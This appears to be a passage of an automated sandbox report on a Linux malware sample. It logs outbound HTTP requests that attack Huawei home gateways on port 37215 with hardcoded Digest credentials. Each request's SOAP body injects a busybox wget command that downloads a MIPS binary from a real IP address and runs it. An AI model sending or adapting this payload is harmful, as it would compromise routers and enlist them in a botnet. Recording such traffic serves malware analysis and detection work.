                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    148192.168.2.234932041.54.199.19637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339849949 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    149192.168.2.235424041.92.111.4437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:56.339867115 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    System Behavior

                                                    Start time (UTC):22:01:44
                                                    Start date (UTC):03/12/2024
                                                    Path:/tmp/x86.elf
                                                    Arguments:/tmp/x86.elf
                                                    File size:63568 bytes
                                                    MD5 hash:6270c32abec4811eac225d85d0970fac

                                                    Start time (UTC):22:01:44
                                                    Start date (UTC):03/12/2024
                                                    Path:/tmp/x86.elf
                                                    Arguments:-
                                                    File size:63568 bytes
                                                    MD5 hash:6270c32abec4811eac225d85d0970fac

                                                    Start time (UTC):22:01:44
                                                    Start date (UTC):03/12/2024
                                                    Path:/tmp/x86.elf
                                                    Arguments:-
                                                    File size:63568 bytes
                                                    MD5 hash:6270c32abec4811eac225d85d0970fac

                                                    Start time (UTC):22:01:44
                                                    Start date (UTC):03/12/2024
                                                    Path:/tmp/x86.elf
                                                    Arguments:-
                                                    File size:63568 bytes
                                                    MD5 hash:6270c32abec4811eac225d85d0970fac
                                                    Start time (UTC):22:01:44
                                                    Start date (UTC):03/12/2024
                                                    Path:/tmp/x86.elf
                                                    Arguments:-
                                                    File size:63568 bytes
                                                    MD5 hash:6270c32abec4811eac225d85d0970fac
                                                    Start time (UTC):22:01:44
                                                    Start date (UTC):03/12/2024
                                                    Path:/tmp/x86.elf
                                                    Arguments:-
                                                    File size:63568 bytes
                                                    MD5 hash:6270c32abec4811eac225d85d0970fac